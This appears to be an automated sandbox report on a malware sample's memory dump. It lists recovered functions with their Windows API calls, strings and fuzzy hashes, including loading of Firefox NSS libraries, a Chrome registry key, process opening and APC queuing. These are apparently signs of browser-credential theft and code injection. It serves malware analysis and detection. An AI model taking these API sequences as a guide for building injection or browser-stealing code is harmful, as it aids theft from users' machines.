wcscpy.NTDLL ref: 009C069F
lstrlenW.KERNEL32(?), ref: 009C06B9
HeapFree.KERNEL32(00000000,?), ref: 009C06D2

Strings

\\?\, xrefs: 009C0613

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID: \\?\
API String ID: 3888849384-4282027825
Opcode ID: 8d70152a1c485f5b432e6ce109350ba04a89f84c852f221bd20b3fd88275ccf3
Instruction ID: 9cbd2e00f08b212869e95afa778f2dd6ca45d0a951ec63f35ea444226b80a7a8
Opcode Fuzzy Hash: 8d70152a1c485f5b432e6ce109350ba04a89f84c852f221bd20b3fd88275ccf3
Instruction Fuzzy Hash: 1C317A3280A118FFCB119BA5DD48DDFBF79FF89364B10841AE004A2161DB30AA95EB61

Uniqueness

Uniqueness Score: -1.00%

Function 009B5BD5, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSPR4.DLL,?,?,00000000), ref: 009B5BEE
LoadLibraryA.KERNEL32(NSS3.DLL,?,00000000), ref: 009B5BFC
LoadLibraryA.KERNEL32(xul.dll,?,00000000), ref: 009B5C11
GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 009B5C1F
GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 009B5C2C

Strings

xul.dll, xrefs: 009B5C0C
NSPR4.DLL, xrefs: 009B5BDE, 009B5BE3
PR_GetError, xrefs: 009B5C19
NSS3.DLL, xrefs: 009B5BF6, 009B5BFB
PR_SetError, xrefs: 009B5C21

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
API String ID: 1469910268-282796573
Opcode ID: 514fdbe97bc1d40ca4ad2df612d79e99b5f2c6d60bebfd91f0e419561a9bc5c6
Instruction ID: 79654b49564bc61f17e2dba46c032844845fd1d8f2df7ec6ee362dfb9ff3b792
Opcode Fuzzy Hash: 514fdbe97bc1d40ca4ad2df612d79e99b5f2c6d60bebfd91f0e419561a9bc5c6
Instruction Fuzzy Hash: 8D218E71AEB7109BD312DB6DEE81B457BE9E798B20B41002BE448D7360D7B08881BB50

Uniqueness

Uniqueness Score: -1.00%

Function 009B45FF, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 009B4632
GetLastError.KERNEL32 ref: 009B4640
NtSetInformationProcess.NTDLL ref: 009B469A
GetProcAddress.KERNEL32(456C7452,00000000), ref: 009B46D9
GetProcAddress.KERNEL32(61657243), ref: 009B46FA
TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 009B4751
CloseHandle.KERNEL32(?), ref: 009B4767
CloseHandle.KERNEL32(?), ref: 009B478D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: f0946f1f5112423e3f754d692c002946d5d6f2ad45140d9f41e80e60a5b9dc02
Instruction ID: da582ab068be8b1bfb502b87bf69cb057e53088d64323ae5f8595fea886efd94
Opcode Fuzzy Hash: f0946f1f5112423e3f754d692c002946d5d6f2ad45140d9f41e80e60a5b9dc02
Instruction Fuzzy Hash: C3419470548345EFD710DF25DD84AABBBE9FB89324F00092EF554D6121DBB1CA88EB52

Uniqueness

Uniqueness Score: -1.00%

Function 009C04D7, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 009C050E
RtlAllocateHeap.NTDLL(00000000,?), ref: 009C0525
GetUserNameW.ADVAPI32(00000000,?), ref: 009C0532
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,009C4545), ref: 009C0558
GetComputerNameW.KERNEL32(00000000,00000000), ref: 009C057F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 009C0593
GetComputerNameW.KERNEL32(00000000,00000000), ref: 009C05A0
HeapFree.KERNEL32(00000000,00000000), ref: 009C05C3

Strings

Client, xrefs: 009C04DE

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Client
API String ID: 3239747167-3236430179
Opcode ID: 0b8bdc52fae441136d88b1dc6fa5c8efa32871ec6606f347eb59fe9af9e0e7e0
Instruction ID: af91bd02d3de7e8007cf37e7544c349774d377c25b36eff3594fd467b2fec740
Opcode Fuzzy Hash: 0b8bdc52fae441136d88b1dc6fa5c8efa32871ec6606f347eb59fe9af9e0e7e0
Instruction Fuzzy Hash: C9311771A65205EFDB10DFA9CC80BAEB7FDEB98300F20446AA405D3251DB70ED409B20

Uniqueness

Uniqueness Score: -1.00%

Function 009D4FE1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,009B23F9,00000000), ref: 009D4FF9

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

FindFirstFileW.KERNEL32(?,00000000), ref: 009D5062
lstrlenW.KERNEL32(0000002C), ref: 009D508A
RemoveDirectoryW.KERNEL32(?), ref: 009D50DC
DeleteFileW.KERNEL32(?), ref: 009D50E7
FindNextFileW.KERNEL32(00000000,00000000), ref: 009D50FA

Strings

}, xrefs: 009D50DC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID: }
API String ID: 499515686-4239843852
Opcode ID: 0aa37dc9e37a8d3a862fe48c0ff36bee5919342249ab94fa558d5c2ba9b0393d
Instruction ID: 7be0dd329a9dcc1fc6529d2a2c9c99d37248cb941bfcdff5ba3496acefa43e52
Opcode Fuzzy Hash: 0aa37dc9e37a8d3a862fe48c0ff36bee5919342249ab94fa558d5c2ba9b0393d
Instruction Fuzzy Hash: EA419270994609EFDF109FA4DD45FAE7FB9FF00304F118066E911A62A1DB71CA84DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009C956E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 009C95BD
lstrlenW.KERNEL32(?), ref: 009C95CB
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 009C95F6
lstrcpyW.KERNEL32(00000006,00000000), ref: 009C9623

Strings

SOFTWARE\Classes\Chrome, xrefs: 009C963A
DelegateExecute, xrefs: 009C9595

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Query$lstrcpylstrlen
String ID: DelegateExecute$SOFTWARE\Classes\Chrome
API String ID: 3961825720-1743081400
Opcode ID: 83595b7daaffe4425bb54a6cddfda2321236d9e8ea455574b36951ba891846e7
Instruction ID: b2fe3bfab9f3fd0969ea6fab3b2167fb0b5ee250aabe434b6d393b658903cea3
Opcode Fuzzy Hash: 83595b7daaffe4425bb54a6cddfda2321236d9e8ea455574b36951ba891846e7
Instruction Fuzzy Hash: A6313C71951209FFDB119FA4CE89E9EBBB8FF04314F10802AB901A62A0D7719E51EB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D298D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009D29AF

Part of subcall function 009B9DAC: RtlNtStatusToDosError.NTDLL(00000000), ref: 009B9DE4
Part of subcall function 009B9DAC: SetLastError.KERNEL32(00000000), ref: 009B9DEB

GetLastError.KERNEL32(?,00000318,00000008), ref: 009D2ABF

Part of subcall function 009C4C67: RtlNtStatusToDosError.NTDLL(00000000), ref: 009C4C7F

memcpy.NTDLL(00000218,009D6E10,00000100,?,00010003,?,?,00000318,00000008), ref: 009D2A3E
RtlNtStatusToDosError.NTDLL(00000000), ref: 009D2A98

Strings

, xrefs: 009D2A05

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: d6f7da8f2a44a1e7ba171c648e212017b1dd88d371304c8bb871f97ee81550e4
Instruction ID: f2911fc261bb2c9c420aa64ca9d59794b14c43122eb42bf5a74c0d53b9a9b999
Opcode Fuzzy Hash: d6f7da8f2a44a1e7ba171c648e212017b1dd88d371304c8bb871f97ee81550e4
Instruction Fuzzy Hash: A8318E75941209AFDB30DFA4DD85BAAB7B8FF14344F10856BE505E7281EB30AE44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009CB1E7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

RtlInitializeCriticalSection.NTDLL(009DE240), ref: 009CB20B
RtlInitializeCriticalSection.NTDLL(009DE220), ref: 009CB221
GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D17C0), ref: 009CB232
GetModuleHandleA.KERNEL32(009DF01D), ref: 009CB25F

Part of subcall function 009CE9BE: GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00000001), ref: 009CE9CF
Part of subcall function 009CE9BE: LoadLibraryA.KERNEL32(NTDSAPI.DLL,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009CEA69
Part of subcall function 009CE9BE: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009CEA74

Strings

t, xrefs: 009CB25F

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID: t
API String ID: 1711133254-2238339752
Opcode ID: ba17e64ab73d5b3cf9070a98b1b41a514ce9caa9c2b93f16be8dacdb0354e979
Instruction ID: 8bacc91e32fa838fd5a64d0019f648787392be1a22e756b17f67633d7d75e935
Opcode Fuzzy Hash: ba17e64ab73d5b3cf9070a98b1b41a514ce9caa9c2b93f16be8dacdb0354e979
Instruction Fuzzy Hash: A6016171DEA3008BD710BFB5EC46A153BA8A795320B04852FD669CB2A0D7B008C4EF51

Uniqueness

Uniqueness Score: -1.00%

Function 009CED4B, Relevance: 7.9, APIs: 6, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 009C5393: memset.NTDLL ref: 009C53B3

Part of subcall function 009C5393: memset.NTDLL ref: 009C54E7
Part of subcall function 009C5393: memset.NTDLL ref: 009C54FC

memcpy.NTDLL(?,00008F12,0000011E), ref: 009CEDD0
memset.NTDLL ref: 009CEE06
memset.NTDLL ref: 009CEE54
memset.NTDLL ref: 009CEED3
memset.NTDLL ref: 009CEF42
memset.NTDLL ref: 009CF012

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 165e94187a63f666b2bcd7e1571cebfb5f55f79cb9879a978388d366fe22798f
Instruction ID: 35ed727ee0715c880cf17e817add168d6b49d03b29eb63fdbce69bb6bcd3a096
Opcode Fuzzy Hash: 165e94187a63f666b2bcd7e1571cebfb5f55f79cb9879a978388d366fe22798f
Instruction Fuzzy Hash: 3DF1F130904B9ACFCB31CF68C994BAABBF5BF51700F24496DC5D796682D231AA45CF12

Uniqueness

Uniqueness Score: -1.00%

Function 009CB585, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,009DE0D4,009DE08C), ref: 009CB5A9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D17C0), ref: 009CB5F4

Part of subcall function 009CC0AB: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,009B402D), ref: 009CC0C2
Part of subcall function 009CC0AB: QueueUserAPC.KERNELBASE(?,00000000,?,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0D7
Part of subcall function 009CC0AB: GetLastError.KERNEL32(00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0E2
Part of subcall function 009CC0AB: TerminateThread.KERNEL32(00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0EC
Part of subcall function 009CC0AB: CloseHandle.KERNEL32(00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0F3
Part of subcall function 009CC0AB: SetLastError.KERNEL32(00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0FC

GetLastError.KERNEL32(Function_00005A92,00000000,00000000), ref: 009CB5DC
CloseHandle.KERNEL32(00000000), ref: 009CB5EC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: 49b87a8956e3242a2a4c94a4453fb81776c72772a8750578cf565f14fb8e3ce0
Instruction ID: e7b1f5bdf1a3a70c08576b2921ecab699235eeaf418c8225bef8b934003fbbb7
Opcode Fuzzy Hash: 49b87a8956e3242a2a4c94a4453fb81776c72772a8750578cf565f14fb8e3ce0
Instruction Fuzzy Hash: A4F0D1B038A340AFE3206B69DC89F777758DB85334B10063AF615C72D1CB604C459A61

Uniqueness

Uniqueness Score: -1.00%

Function 009B7878, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 009B788C
GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 009B78CC
RtlNtStatusToDosError.NTDLL(00000000), ref: 009B78D5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Error$InformationLastQueryStatusThread
String ID:
API String ID: 2450163249-0
Opcode ID: 83f1d7a2404c8fc875121fc1c14d6723d6728d76f1916d7c6d91f06ce55f311f
Instruction ID: 29382f8c29a4ba5d650d1231ae54ea5858e26ecc44e6c58b33df8a4502ab7d69
Opcode Fuzzy Hash: 83f1d7a2404c8fc875121fc1c14d6723d6728d76f1916d7c6d91f06ce55f311f
Instruction Fuzzy Hash: 96014675944108FBEB10ABE5DD49EEEBBBDEB84710F00042AFA01E2061EB35D904EB20

Uniqueness

Uniqueness Score: -1.00%

Function 009BAA15, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 009BAA46
RtlNtStatusToDosError.NTDLL(C000009A), ref: 009BAA7D

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: e2f5f1532d6197e3530ff5a22dd41255991b31ebeb8128ad6295bfc96749e902
Instruction ID: 1182fe4b204064d199f545433bb3922548e0bc8cbe3084e09f0e9150f28b0f23
Opcode Fuzzy Hash: e2f5f1532d6197e3530ff5a22dd41255991b31ebeb8128ad6295bfc96749e902
Instruction Fuzzy Hash: 0501F936902524FBC7219B548F04BEFBA6EDF85B70F120015BD11A3114D7348E00D6F2

Uniqueness

Uniqueness Score: -1.00%

Function 009C40A7, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009C40C6
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 009C40DE

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: c52d262b876f9dc10140075b1522a158ea4407d9e4bbdce11948694560f49857
Instruction ID: a5c76bd1a1ac575ec52aa35c4da177ddb94ec7881803af0769795fb1813bedae
Opcode Fuzzy Hash: c52d262b876f9dc10140075b1522a158ea4407d9e4bbdce11948694560f49857
Instruction Fuzzy Hash: 54F06276A0421CBADB10DA91CC05FDE7BBCDB14780F444065FA18E6091D770DB84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B9DAC, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 009B9DE4
SetLastError.KERNEL32(00000000), ref: 009B9DEB

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 05b0bf04a8d78551322b7840ef0dce24644861dbcaa86e6249ad79a9abb8dfb9
Instruction ID: 62c9be355fb742f55be2e6a68aee99e1faf5a6649e8ba635aa3750d45e27c338
Opcode Fuzzy Hash: 05b0bf04a8d78551322b7840ef0dce24644861dbcaa86e6249ad79a9abb8dfb9
Instruction Fuzzy Hash: 91F05E71521309FBEB05CB95DD4ABEE77BCEB10315F104048B200A60C0EBB4AB44DB64

Uniqueness

Uniqueness Score: -1.00%

Function 009C1606, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 009C1633
SetLastError.KERNEL32(00000000,?,009C197E,?,00000000,00000000,00000004,?,00000000,00000000,74784EE0,00000000), ref: 009C163A

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 19928222dd70ba5625db6e5c1d87a650516fb4c732dd9953f054987f3131b6d7
Instruction ID: b04f24a2e43d01ffc0b16ef086639e29eee0d9330259bd88af95a3cdc64e7b80
Opcode Fuzzy Hash: 19928222dd70ba5625db6e5c1d87a650516fb4c732dd9953f054987f3131b6d7
Instruction Fuzzy Hash: CDE04F3264521AABCF015FE9ED04E9B7B6DEB4D790B048015BE01C2122CB31C861ABF5

Uniqueness

Uniqueness Score: -1.00%

Function 009B37E7, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 009B3814
SetLastError.KERNEL32(00000000,?,009D2A79,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 009B381B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: d0bd5e087cd0f5b27be71c84478a5c243aba85d43a383c16cde265e0874d21e4
Instruction ID: 7bd3aa9ba43dafd4b5dc90d428ad7bc8e342e4adbdfa130d87a64f3c1d49020a
Opcode Fuzzy Hash: d0bd5e087cd0f5b27be71c84478a5c243aba85d43a383c16cde265e0874d21e4
Instruction Fuzzy Hash: 63E01A3264521AABCF129FE9AD04D9B7B69BB087A0B008021BE01C2121DA31D961ABE1

Uniqueness

Uniqueness Score: -1.00%

Function 009BD0DC, Relevance: 2.9, APIs: 2, Instructions: 416COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009BD4B4
memset.NTDLL ref: 009BD4C3

Part of subcall function 009B9DFC: memset.NTDLL ref: 009B9E0D
Part of subcall function 009B9DFC: memset.NTDLL ref: 009B9E19
Part of subcall function 009B9DFC: memset.NTDLL ref: 009B9E44

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 901fb57dd579aca51b006c865f834b69d11bb4b6438bcc436a2491ef44e66cbb
Instruction ID: 5c475c61d7b09ca684dedc96442a997cb8a2aa20632c8be8aad31d1c2f873175
Opcode Fuzzy Hash: 901fb57dd579aca51b006c865f834b69d11bb4b6438bcc436a2491ef44e66cbb
Instruction Fuzzy Hash: 0B022270502B528FCB79CF29C6805A6B7F5BF517247604E2ED6E786AA1E231F881CF14

Uniqueness

Uniqueness Score: -1.00%

Function 009C8BF3, Relevance: 1.9, APIs: 1, Instructions: 610COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009C928A

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ecbea8a852eaafebc1e0ec98c08f47c6db272d4ef72c1f33184d83e3dde19467
Instruction ID: 5f57d841bd9cbd6f9489afe4f063c6b2665b59e0a5d4c5a0dbc4df030dce36ba
Opcode Fuzzy Hash: ecbea8a852eaafebc1e0ec98c08f47c6db272d4ef72c1f33184d83e3dde19467
Instruction Fuzzy Hash: 9922837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 009BE384, Relevance: 1.8, Strings: 1, Instructions: 583COMMON

Download Yara Rule

Strings

, xrefs: 009BE6E9

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8a890b7f9839edbe13cbdd3305c55f1a9115d6ff546bf366d64f89dcc6041057
Instruction ID: 730675b1e88afb70cdbe5eb76ca5ba2354f767525464875792024ce13331cfbe
Opcode Fuzzy Hash: 8a890b7f9839edbe13cbdd3305c55f1a9115d6ff546bf366d64f89dcc6041057
Instruction Fuzzy Hash: 2B429B70A00B158FCB29CF69C5D06EABBF9FF99324F14896DD48697651E734A886CF00

Uniqueness

Uniqueness Score: -1.00%

Function 009CD057, Relevance: 1.8, APIs: 1, Instructions: 556COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,00000000,000000FE,00000000,?,00000000), ref: 009CD415

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f2708de2da96fa729053b5f56c4fa86ee1fe5dd095277c64a8c46cc35d9c2f28
Instruction ID: 0a8dab07ebb696731c9fd39d2aae9055cc38b9e88064af38262ad2785d6361a5
Opcode Fuzzy Hash: f2708de2da96fa729053b5f56c4fa86ee1fe5dd095277c64a8c46cc35d9c2f28
Instruction Fuzzy Hash: A7325571E01205DBDF18CF58C480BAEBBF6BF98314F2481ADD855AB286D774DA41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009B4C03, Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

@, xrefs: 009B4F3D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: b82112b922cc76057150f380a2024599876a978dea75dfcf29ca14efca67b53f
Instruction ID: 8ceb7b8a508e50c24cba6767ce77cff9a577b4074c248a6ff945df87f42c1a7e
Opcode Fuzzy Hash: b82112b922cc76057150f380a2024599876a978dea75dfcf29ca14efca67b53f
Instruction Fuzzy Hash: 95D16D30A0024ADFCF18CFA8C6905FEBBB1FF94324F24856DE95297282E7749955EB50

Uniqueness

Uniqueness Score: -1.00%

Function 009D1CB8, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 009D1CF2

Part of subcall function 009BD9EB: ResumeThread.KERNEL32(00000004,?,009B9809,?), ref: 009BDA00

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CreateProcessResumeThreadUser
String ID:
API String ID: 3393100766-0
Opcode ID: 6329ceb0387195ef4031e626d2b92dc4faf15182fd94c04144887845a5a7348a
Instruction ID: 05d42d556acb87462b81df555b9e4ccdaaba88fc7404df1821056f78c66dac89
Opcode Fuzzy Hash: 6329ceb0387195ef4031e626d2b92dc4faf15182fd94c04144887845a5a7348a
Instruction Fuzzy Hash: 3DF0FF32215109BF9F025F99DC41CDA7F6AFF49374B054225FD1992160C772DC21DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009C4C67, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 009C4C7F

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: 42505a006d09a75fd712189f68960b26c59a7822ec0b4ddc1e4adf8194da7056
Instruction ID: 506493297714362b658fa1731cfc85904913f17e1bca535f330172b534543a11
Opcode Fuzzy Hash: 42505a006d09a75fd712189f68960b26c59a7822ec0b4ddc1e4adf8194da7056
Instruction Fuzzy Hash: 0BC0123168A2017FDA185B10DD1DE2A7B19EB90340F00441DB14981074DAB09890D612

Uniqueness

Uniqueness Score: -1.00%

Function 009CD7BD, Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3362f827f5b9d76bd4cb6cd4e9c49f4ef5575fbd857f74b84aae74b36e2f861
Instruction ID: 6fbe30d3fd2b7915d3cec4a2758f9827b9c71ab654953bf91f8db24a28b7266b
Opcode Fuzzy Hash: a3362f827f5b9d76bd4cb6cd4e9c49f4ef5575fbd857f74b84aae74b36e2f861
Instruction Fuzzy Hash: 1D425971E11219DBCF18CF58C590AACBBF6FF88311F1481AED852AB285D7789A40DF91

Uniqueness

Uniqueness Score: -1.00%

Function 009D3EAF, Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
Instruction ID: 72df2a3fe394be181549c7ed3212b5ae2f86a1ed005b32f7b141a5c398e9dfa6
Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
Instruction Fuzzy Hash: D2F14430A08659ABCF0CCF99D4A04ADBBB2FFA9314B24C19EE4A667745CB345A45CF14

Uniqueness

Uniqueness Score: -1.00%

Function 009C48AD, Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 9a087def743fc05dc18c6505693c44ba1b022a94a87237c5ca9dde3b990e557c
Instruction ID: a32cf2e550017e04e896221b8994cb3640f48b5522eb6052a017f6548906b9ba
Opcode Fuzzy Hash: 9a087def743fc05dc18c6505693c44ba1b022a94a87237c5ca9dde3b990e557c
Instruction Fuzzy Hash: 5DC10F35A00B508FD325CF29C5A0AA6B3E5FF89704B54492ED9D787B61DB36F881CB02

Uniqueness

Uniqueness Score: -1.00%

Function 009D7188, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
Instruction ID: 2b15a53876d2b99aa5042b0519a94fab3f6acaf8c8c821f9b63767407ee8e9a3
Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
Instruction Fuzzy Hash: C521D6329042459BCB10DFA8C8809ABFBA9FF45360B45C56AED659B345E730F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 009B1E8A, Relevance: 51.4, APIs: 34, Instructions: 399synchronizationtimethreadCOMMON

Download Yara Rule

